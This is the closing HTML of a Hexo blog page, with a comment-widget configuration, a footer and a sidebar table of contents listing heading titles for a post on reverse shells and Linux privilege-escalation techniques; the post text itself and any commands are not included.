var valineConfig = {"enable":true,"appId":"QrmzEeS3e4xvmJxO1dSPlkW4-gzGzoHsz","appKey":"ov6uvwKnDQmJxtpeS0wvBIwL","placeholder":"","visitor":true,"avatar":"monsterid","requiredFields":["nick","mail"],"pageView":true}
valineConfig.el='#vcomment';
new Valine(valineConfig);
    // new Valine({
    //     el: '#vcomment',
    //     appId: "",
    //     appKey: "",
    //     placeholder: "",
    //     avatar:"monsterid",
    //     visitor: "true",
    //     requiredFields: "nick,mail".split(','),
    // });
</script>

		</section>
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-01-15 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/进攻性渗透测试/">进攻性渗透测试<span>8</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E4%B8%80%E3%80%81shell%E6%98%AF%E4%BB%80%E4%B9%88"><span class="toc-article-text">一、shell是什么</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Shell%E7%9A%84%E7%B1%BB%E5%9E%8B"><span class="toc-article-text">Shell的类型</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%B8%80-Netcat-shell"><span class="toc-article-text">(一) Netcat shell</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#Netcat-shell"><span class="toc-article-text">Netcat shell</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%A8%B3%E5%AE%9Ashell"><span class="toc-article-text">稳定shell</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E2%85%A0-python"><span class="toc-article-text">Ⅰ. python</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E2%85%A1-rlwarp"><span class="toc-article-text">Ⅱ. rlwarp</span></a></li><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E2%85%A2-socat"><span class="toc-article-text">Ⅲ. socat</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%BA%8C-Socket-shell"><span class="toc-article-text">(二) Socket shell</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#Socket-shell"><span class="toc-article-text">Socket shell</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E5%8A%A0%E5%AF%86shell"><span class="toc-article-text">加密shell</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%B8%89-Msfvenom"><span class="toc-article-text">(三) Msfvenom</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E5%9B%9B-Webshells"><span class="toc-article-text">(四)Webshells</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Linux%E7%BB%83%E4%B9%A0%E7%AE%B1"><span class="toc-article-text">Linux练习箱</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Windows%E7%BB%83%E4%B9%A0%E7%AE%B1"><span class="toc-article-text">Windows练习箱</span></a></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E4%BA%8C%E3%80%81%E5%B8%B8%E8%A7%81Linux%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%8A%80%E6%9C%AF"><span class="toc-article-text">二、常见Linux权限提升技术</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%B8%80-%E6%9E%9A%E4%B8%BE"><span class="toc-article-text">(一) 枚举</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E5%A6%82%E4%BD%95%E5%9C%A8%E7%9B%AE%E6%A0%87%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%8E%B7%E5%BE%97LinEnum"><span class="toc-article-text">如何在目标计算机获得LinEnum</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#LinEnum%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-article-text">LinEnum的使用</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%BB%83%E4%B9%A0"><span class="toc-article-text">练习</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFsuid%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%96%87%E4%BB%B6"><span class="toc-article-text">什么是suid二进制文件</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E5%AF%BB%E6%89%BEsuid%E6%96%87%E4%BB%B6"><span class="toc-article-text">寻找suid文件</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E5%88%A9%E7%94%A8suid%E6%96%87%E4%BB%B6"><span class="toc-article-text">利用suid文件</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%B8%89-%E5%88%A9%E7%94%A8%E5%8F%AF%E5%86%99%E7%9A%84-etc-passwd"><span class="toc-article-text">(三) 利用可写的 &#x2F;etc&#x2F;passwd</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E4%BD%95%E4%B8%BA-etc-passwd"><span class="toc-article-text">何为&#x2F;etc&#x2F;passwd</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#etc-passwd%E7%9A%84%E6%A0%BC%E5%BC%8F"><span class="toc-article-text">&#x2F;etc&#x2F;passwd的格式</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%BB%83%E4%B9%A0-1"><span class="toc-article-text">练习</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E5%9B%9B-%E5%88%A9%E7%94%A8vi%E7%BC%96%E8%BE%91%E5%99%A8"><span class="toc-article-text">(四) 利用vi编辑器</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#sudo-l%E5%91%BD%E4%BB%A4"><span class="toc-article-text">sudo -l命令</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%BB%83%E4%B9%A0-2"><span class="toc-article-text">练习</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%BA%94-%E5%88%A9%E7%94%A8crontab"><span class="toc-article-text">(五) 利用crontab</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E4%BD%95%E4%B8%BACron%E8%BF%9B%E7%A8%8B"><span class="toc-article-text">何为Cron进程</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#Cronjob%E7%9A%84%E6%A0%BC%E5%BC%8F"><span class="toc-article-text">Cronjob的格式</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%BB%83%E4%B9%A0-3"><span class="toc-article-text">练习</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E5%85%AD-%E5%88%A9%E7%94%A8PATH%E5%8F%98%E9%87%8F"><span class="toc-article-text">(六) 利用PATH变量</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF-PATH"><span class="toc-article-text">什么是$PATH</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E5%A6%82%E4%BD%95%E5%88%A9%E7%94%A8-PATH"><span class="toc-article-text">如何利用$PATH</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%BB%83%E4%B9%A0-4"><span class="toc-article-text">练习</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E6%89%A9%E5%B1%95"><span class="toc-article-text">扩展</span></a></li></ol></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E4%B8%89%E3%80%81Linux%E6%8F%90%E6%9D%83%E7%BB%83%E4%B9%A0"><span class="toc-article-text">三、Linux提权练习</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2024 X1NRI's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
